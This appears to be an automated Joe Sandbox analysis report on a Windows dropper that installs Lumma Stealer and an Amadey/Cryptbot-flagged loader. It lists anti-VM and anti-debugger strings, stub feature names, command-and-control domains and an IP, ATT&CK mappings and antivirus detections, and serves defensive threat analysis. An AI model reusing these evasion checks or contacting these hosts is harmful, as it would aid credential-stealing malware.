      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2616A push edx; ret 2_2_00E2616B
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C368CB push ecx; ret 3_3_00C3693A
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C368CB push ecx; ret 3_3_00C3693A
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C32CD5 push 2BE400BFh; ret 3_3_00C32CE2
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C35084 push ecx; ret 3_3_00C35086
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C35084 push ecx; ret 3_3_00C35086
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3684F push edi; ret 3_3_00C36852
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3684F push edi; ret 3_3_00C36852
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3D005 push ss; retn 0000h3_3_00C3D006
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3D005 push ss; retn 0000h3_3_00C3D006
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3D005 push ss; retn 0000h3_3_00C3D006
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3D005 push ss; retn 0000h3_3_00C3D006
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C351CC push edx; ret 3_3_00C351CE
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C351CC push edx; ret 3_3_00C351CE
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C31DDD push ds; ret 3_3_00C31DDE
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C30584 push es; ret 3_3_00C30586
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C36D9F pushad ; ret 3_3_00C36DA2
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C36D9F pushad ; ret 3_3_00C36DA2
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C355A5 push esi; ret 3_3_00C355A6
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C355A5 push esi; ret 3_3_00C355A6
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C36941 push eax; ret 3_3_00C36942
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C36941 push eax; ret 3_3_00C36942
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C35548 push esp; ret 3_3_00C3554A
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C35548 push esp; ret 3_3_00C3554A
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3955C pushad ; ret 3_3_00C3955D
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile created: C:\Users\user\AppData\Local\Temp\LummaC2.exeJump to dropped file
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile created: C:\Users\user\AppData\Local\Temp\Set-up.exeJump to dropped file
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: PROCMON.EXE
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: X64DBG.EXE
      Source: jo0PnKm2Lg.exeBinary or memory string: SBIEDLL.DLL
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: WINDBG.EXE
      Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: WIRESHARK.EXE
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMemory allocated: 18A0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMemory allocated: 3520000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeAPI coverage: 7.1 %
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exe TID: 3732Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: Set-up.exe.0.drBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
      Source: jo0PnKm2Lg.exeBinary or memory string: vmware
      Source: jo0PnKm2Lg.exeBinary or memory string: <Module>Set-up.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSet-upEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksbixauhucnaw.resources
Source: Set-up.exe, 00000003.00000003.2202650165.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT)
Source: Set-up.exe | Binary or memory string: Hyper-V RAW
Source: jo0PnKm2Lg.exe | Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000003.00000003.2203504484.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exe, 00000003.00000003.2290027870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2289789125.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290098678.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2291369007.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290126041.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290603374.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | API call chain: ExitProcess graph end node (graph_2-14167)
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 2_2_00E323F0 LdrInitializeThunk,2_2_00E323F0
Source: C:\Users\user\Desktop\jo0PnKm2Lg.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: berserkyfir.click
Source: C:\Users\user\Desktop\jo0PnKm2Lg.exe | Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Source: C:\Users\user\Desktop\jo0PnKm2Lg.exe | Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\Desktop\jo0PnKm2Lg.exe | Queries volume information: C:\Users\user\Desktop\jo0PnKm2Lg.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | Binary or memory string: procmon.exe
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 3128, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: global traffic | TCP traffic: 192.168.2.5:49723 -> 176.53.147.104:80

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 3128, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one column per tactic; a technique followed by a number in parentheses was matched by that many signatures in this analysis):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | PowerShell (1) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (211) | Remote Services | Screen Capture (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (11) | Remote Desktop Protocol | Archive Collected Data (11) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (31) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Clipboard Data (2) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (15) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (11) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Information Discovery (13) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Source | Detection | Scanner | Label
jo0PnKm2Lg.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
jo0PnKm2Lg.exe | 69% | Virustotal | none
jo0PnKm2Lg.exe | 100% | Avira | HEUR/AGEN.1357339
jo0PnKm2Lg.exe | 100% | Joe Sandbox ML | none
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\LummaC2.exe | 100% | Joe Sandbox ML | none
C:\Users\user\AppData\Local\Temp\LummaC2.exe | 68% | ReversingLabs | Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\Set-up.exe | 75% | ReversingLabs | Win32.Trojan.Amadey
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
gPhome.twelve12vs.top | 100% | Avira URL Cloud | malware
berserkyfir.click | 100% | Avira URL Cloud | malware
twelve12vse12vs.top | 0% | Avira URL Cloud | safe
twelve12vs.top.top | 0% | Avira URL Cloud | safe
twelve12vs.top | 100% | Avira URL Cloud | malware
a.dnspod.comvs.top | 0% | Avira URL Cloud | safe
home.twelve12vs.top | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | none | high
home.twelve12vs.top | 176.53.147.104 | true | true | none | unknown
httpbin.org | 3.210.94.60 | true | false | none | high
Name | Malicious | Antivirus Detection | Reputation
cloudewahsj.shop | false | none | high
noisycuttej.shop | false | none | high
berserkyfir.click | true | Avira URL Cloud: malware | unknown
nearycrepso.shop | false | none | high
rabidcowse.shop | false | none | high
gPhome.twelve12vs.top | true | Avira URL Cloud: malware | unknown
wholersorie.shop | false | none | high
twelve12vse12vs.top | true | Avira URL Cloud: safe | unknown
twelve12vs.top.top | true | Avira URL Cloud: safe | unknown
twelve12vs.top | true | Avira URL Cloud: malware | unknown
framekgirus.shop | false | none | high
a.dnspod.comvs.top | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | none | high
home.twelve12vs.top | true | Avira URL Cloud: malware | unknown
tirepublicerj.shop | false | none | high
abruptyopsn.shop | false | none | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | Set-up.exe.0.dr | false | none | high
http://html4/loose.dtd | jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | false | none | high
https://httpbin.org/ipbefore | jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | false | none | high
https://curl.se/docs/http-cookies.html | jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | false | none | high
https://curl.se/docs/alt-svc.html | Set-up.exe.0.dr | false | none | high
http://.css | jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | false | none | high
http://.jpg | jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | false | none | high
IP | Domain | Country | ASN | ASN Name | Malicious
176.53.147.104 | home.twelve12vs.top | United Kingdom | 35791 | VANNINVENTURESGB | true
3.210.94.60 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1589511
                                            Start date and time:2025-01-12 17:44:13 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 7s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:6
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:jo0PnKm2Lg.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:8398fc4aa3a5a5ab6ae7ed394b449d0a.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@5/3@8/2
                                            EGA Information:
                                            • Successful, ratio: 33.3%
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 20.190.159.73, 20.190.159.23, 20.190.159.0, 20.190.159.71, 40.126.31.73, 20.190.159.4, 40.126.31.69, 20.190.159.75, 13.107.246.45, 20.109.210.53, 23.1.237.91
                                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target Set-up.exe, PID 3128 because there are no executed functions
                                            • Execution Graph export aborted for target jo0PnKm2Lg.exe, PID 3580 because it is empty
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.53.147.104 | FYQ6Ee6gbS.exe | malicious | Cryptbot | home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | Axion.exe | malicious | SheetRat | 199.232.210.172
bg.microsoft.map.fastly.net | eufS6WOuOx.exe | malicious | DCRat | 199.232.214.172
bg.microsoft.map.fastly.net | hgTNnG8vjD.exe | malicious | DarkComet | 199.232.210.172
bg.microsoft.map.fastly.net | https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.html | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | 281388015101323984.js | malicious | Strela Downloader | 199.232.210.172
bg.microsoft.map.fastly.net | 305861283730376077.js | malicious | Strela Downloader | 199.232.214.172
bg.microsoft.map.fastly.net | 14444181562539231561.js | malicious | Strela Downloader | 199.232.210.172
bg.microsoft.map.fastly.net | 733422181158883785.js | malicious | Strela Downloader | 199.232.210.172
bg.microsoft.map.fastly.net | 2836992752554325080.js | malicious | Strela Downloader | 199.232.210.172
bg.microsoft.map.fastly.net | 1274320496157183071.js | malicious | Strela Downloader | 199.232.214.172
httpbin.org | FYQ6Ee6gbS.exe | malicious | Cryptbot | 50.19.58.113
httpbin.org | Set-up.exe | malicious | Cryptbot | 50.19.58.113
httpbin.org | Set-up.exe | malicious | Cryptbot | 50.19.58.113
httpbin.org | Set-up.exe | malicious | Cryptbot | 50.19.58.113
httpbin.org | ebjtOH70jl.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 34.197.122.172
httpbin.org | random(3).exe | malicious | Cryptbot | 34.200.57.114
httpbin.org | random(5).exe | malicious | Cryptbot | 34.200.57.114
httpbin.org | Set-up.exe | malicious | Unknown | 34.200.57.114
httpbin.org | Set-up.exe | malicious | Unknown | 34.200.57.114
httpbin.org | TX5LAYBZRI.exe | malicious | Unknown | 34.200.57.114
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VANNINVENTURESGB | FYQ6Ee6gbS.exe | malicious | Cryptbot | 176.53.147.104
VANNINVENTURESGB | random(4).exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 176.53.146.223
VANNINVENTURESGB | random(3).exe | malicious | Cryptbot | 176.53.146.223
VANNINVENTURESGB | Prs9eAnu2k.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURESGB | joE9s9sbv0.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURESGB | JbN2WYseAr.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURESGB | ivHDHq51Ar.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURESGB | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 176.53.146.212
VANNINVENTURESGB | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | 176.53.146.212
VANNINVENTURESGB | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | 176.53.146.212
AMAZON-AESUS | 5vrRrFN56j.exe | malicious | Bdaejec | 44.221.84.105
AMAZON-AESUS | res.ppc.elf | malicious | Unknown | 44.201.61.229
AMAZON-AESUS | res.mips.elf | malicious | Unknown | 54.24.210.36
AMAZON-AESUS | res.m68k.elf | malicious | Unknown | 54.175.16.42
AMAZON-AESUS | res.mpsl.elf | malicious | Unknown | 34.199.188.151
AMAZON-AESUS | https://terrific-metal-countess.glitch.me/ | malicious | HTMLPhisher | 18.235.164.84
AMAZON-AESUS | https://adopt0098.bitbucket.io/ | malicious | HTMLPhisher | 52.6.240.60
